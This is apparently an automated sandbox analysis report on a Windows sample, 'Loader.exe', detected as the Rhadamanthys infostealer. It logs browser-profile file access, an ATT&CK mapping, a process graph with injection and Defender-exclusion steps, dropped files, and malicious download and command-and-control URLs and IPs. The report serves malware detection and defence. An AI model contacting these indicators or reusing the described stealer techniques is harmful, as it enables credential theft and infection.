                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\yiaxs5ej.default
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\ms-language-packs\browser
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\ms-language-packs
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb
                    Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents

                    Remote Access Functionality

                    barindex
                    Yara detected RHADAMANTHYS Stealer
                    Source: Yara matchFile source: 00000010.00000003.2840379092.00000000003E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2935727529.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2844728394.0000000001320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		Valid Accounts11
                    Windows Management Instrumentation                    		1
                    Scripting                    		1
                    DLL Side-Loading                    		111
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Native API                    		1
                    DLL Side-Loading                    		1
                    Extra Window Memory Injection                    		1
                    Deobfuscate/Decode Files or Information                    		11
                    Input Capture                    		13
                    File and Directory Discovery                    		Remote Desktop Protocol1
                    Browser Session Hijacking                    		21
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts12
                    Command and Scripting Interpreter                    		Logon Script (Windows)1
                    Access Token Manipulation                    		4
                    Obfuscated Files or Information                    		Security Account Manager117
                    System Information Discovery                    		SMB/Windows Admin Shares11
                    Data from Local System                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts1
                    PowerShell                    		Login Hook311
                    Process Injection                    		2
                    Software Packing                    		NTDS1
                    Query Registry                    		Distributed Component Object Model11
                    Input Capture                    		3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets111
                    Security Software Discovery                    		SSH1
                    Clipboard Data                    		14
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Extra Window Memory Injection                    		Cached Domain Credentials1
                    Process Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Masquerading                    		DCSync41
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                    Virtualization/Sandbox Evasion                    		Proc Filesystem1
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Access Token Manipulation                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
                    Process Injection                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579550 Sample: Loader.exe Startdate: 22/12/2024 Architecture: WINDOWS Score: 100 91 x.ns.gin.ntt.net 2->91 93 ntp1.net.berkeley.edu 2->93 95 6 other IPs or domains 2->95 123 Suricata IDS alerts for network traffic 2->123 125 Found malware configuration 2->125 127 Antivirus / Scanner detection for submitted sample 2->127 129 6 other signatures 2->129 13 explorer.exe 2->13         started        15 Loader.exe 10 261 2->15         started        signatures3 process4 file5 18 medicalanalysispro.exe 4 13->18         started        83 C:\Users\user\AppData\Local\Temp\...\UAC.dll, PE32 15->83 dropped 85 C:\Users\user\AppData\Local\Temp\...85Act.dll, PE32 15->85 dropped 87 C:\Users\user\AppData\Local\Temp\...\zip.dll, PE32 15->87 dropped 89 94 other files (none is malicious) 15->89 dropped 21 CampaignHardwareLauncher.exe 15->21         started        process6 file7 73 C:\Users\user\...\medicallanalysis.exe, PE32 18->73 dropped 75 C:\Users\user\AppData\...\medicalanalysis.exe, PE32 18->75 dropped 23 medicalanalysis.exe 18->23         started        27 medicallanalysis.exe 18->27         started        30 javaw.exe 27 21->30         started        process8 dnsIp9 103 erdogansigorta.com 5.2.81.126, 443, 49736 ALASTYRTR Turkey 23->103 131 Writes to foreign memory regions 23->131 133 Injects a PE file into a foreign processes 23->133 32 InstallUtil.exe 23->32         started        77 C:\Users\user\AppData\Roaming\...\prefs.js, ASCII 27->77 dropped 135 Overwrites Mozilla Firefox settings 27->135 137 Tries to harvest and steal browser information (history, passwords, etc) 27->137 35 cmd.exe 27->35         started        105 77.238.245.43, 49730, 80 TELERU-ASRU Russian Federation 30->105 79 C:\...\8b774b6fbd21273c42f034e15d863942.bat, DOS 30->79 dropped 81 C:\Users\user\...\medicalanalysispro.exe, PE32+ 30->81 dropped 37 cmd.exe 1 30->37         started        39 explorer.exe 1 30->39         started        file10 signatures11 process12 signatures13 117 Switches to a custom stack to bypass stack traces 32->117 41 svchost.exe 32->41         started        45 WerFault.exe 32->45         started        47 conhost.exe 35->47         started        49 timeout.exe 35->49         started        119 Bypasses PowerShell execution policy 37->119 121 Adds a directory exclusion to Windows Defender 37->121 51 powershell.exe 23 37->51         started        53 conhost.exe 37->53         started        process14 dnsIp15 113 104.37.175.218, 49859, 49929, 49959 MAJESTIC-HOSTING-01US United States 41->113 141 System process connects to network (likely due to code injection or exploit) 41->141 143 Switches to a custom stack to bypass stack traces 41->143 55 svchost.exe 41->55         started        145 Loading BitLocker PowerShell Module 51->145 59 WmiPrvSE.exe 51->59         started        signatures16 process17 dnsIp18 107 ntp1.net.berkeley.edu 169.229.128.134, 123, 63530 UCBUS United States 55->107 109 ntp.time.nl 94.198.159.10, 123, 63530 SIDNNL Netherlands 55->109 111 4 other IPs or domains 55->111 139 Tries to harvest and steal browser information (history, passwords, etc) 55->139 61 chrome.exe 55->61         started        64 msedge.exe 55->64         started        66 wmplayer.exe 55->66         started        signatures19 process20 dnsIp21 115 239.255.255.250 unknown Reserved 61->115 68 chrome.exe 61->68         started        71 msedge.exe 64->71         started        process22 dnsIp23 97 127.0.0.1 unknown unknown 68->97 99 chrome.cloudflare-dns.com 162.159.61.3, 443, 49936, 49942 CLOUDFLARENETUS United States 71->99 101 172.64.41.3, 443, 49937, 49941 CLOUDFLARENETUS United States 71->101

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Loader.exe28%VirustotalBrowse
                    Loader.exe24%ReversingLabsWin32.Trojan.Generic
                    Loader.exe100%AviraHEUR/AGEN.1312915

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\CampaignHardwareLauncher\uninst.exe0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe3%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JAWTAccessBridge-32.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JAWTAccessBridge.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JavaAccessBridge-32.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JavaAccessBridge.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\WindowsAccessBridge-32.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\WindowsAccessBridge.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\awt.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\bci.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\client\jvm.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dcpr.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\decora_sse.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\deploy.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dt_shmem.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dt_socket.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dtplugin\deployJava1.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dtplugin\npdeployJava1.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\eula.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\fontmanager.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\fxplugins.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\glass.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\glib-lite.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\gstreamer-lite.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\hprof.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\instrument.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\j2pcsc.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\j2pkcs11.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jaas_nt.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jabswitch.exe0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java-rmi.exe0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java.exe0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java_crw_demo.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javacpl.cpl0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javacpl.exe0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_font.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_font_t2k.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_iio.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaws.exe0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jawt.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jdwp.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfr.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfxmedia.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfxwebkit.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jjs.exe0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jli.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2iexp.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2launcher.exe0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2native.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2ssv.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jpeg.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsdt.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsound.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsoundds.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\kcms.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\keytool.exe0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\kinit.exe0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\klist.exe0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\ktab.exe0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\lcms.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\management.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\mlib_image.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcp120.dll0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    chrome.cloudflare-dns.com
                    		162.159.61.3
                    		truefalse
                      		high
                      gbg1.ntp.netnod.se
                      		194.58.203.20
                      		truefalse
                        		unknown
                        x.ns.gin.ntt.net
                        		129.250.35.250
                        		truefalse
                          		high
                          ntp1.net.berkeley.edu
                          		169.229.128.134
                          		truefalse
                            		high
                            ntp.time.nl
                            		94.198.159.10
                            		truefalse
                              		high
                              ntp.time.in.ua
                              		62.149.0.30
                              		truefalse
                                		high
                                erdogansigorta.com
                                		5.2.81.126
                                		truefalse
                                  		unknown
                                  ntp1.hetzner.de
                                  		213.239.239.164
                                  		truefalse
                                    		high
                                    gbg1.ntp.se
                                    		unknown
                                    		unknownfalse
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://77.238.245.43/tamus/medicalanalysispro.zipfalse
                                        		unknown
                                        https://erdogansigorta.com/temp/Nomrwfj.mp4false
                                          		unknown
                                          https://104.37.175.218:7982/da03ab84e7f8187e6/v3iuaiea.tsf2otrue
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://apache.org/xml/xmlschema/1.0/anonymousTypesDjavaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://javafx.com/fxml/1javaw.exe, 00000003.00000002.4539258471.000000000AA64000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                http://apache.org/xml/features/dom/create-entity-ref-nodesjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://javax.xml.XMLConstants/property/accessExternalDTDRjavaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://apache.org/xml/features/validation/dynamicjavaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://apache.org/xml/features/validation/schema/augment-psvijavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://java.sun.com/xml/schema/features/javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://apache.org/xml/properties/internal/validator/dtdjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://apache.org/xml/properties/localeFjavaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://apache.org/xml/properties/input-buffer-sizejavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://apache.org/xml/properties/internal/datatype-validator-factoryjavaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://apache.org/xml/properties/internal/validator/schemajavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://xml.org/sax/features/allow-dtd-events-after-endDTD7javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://apache.org/xml/properties/dom/document-class-name3javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://apache.org/xml/features/internal/tolerate-duplicatesOjavaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://apache.org/xml/features/validate-annotationsjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://xml.org/sax/features/namespace-prefixesjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://apache.org/xml/properties/internal/entity-managerjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://127.0.0.1:8000/446d3de0/c7af6c55msedge.exe, 0000001B.00000002.3174477570.00004D3C002D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://apache.org/xml/properties/internal/dtd-processorjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://apache.org/xml/features/namespace-growthjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
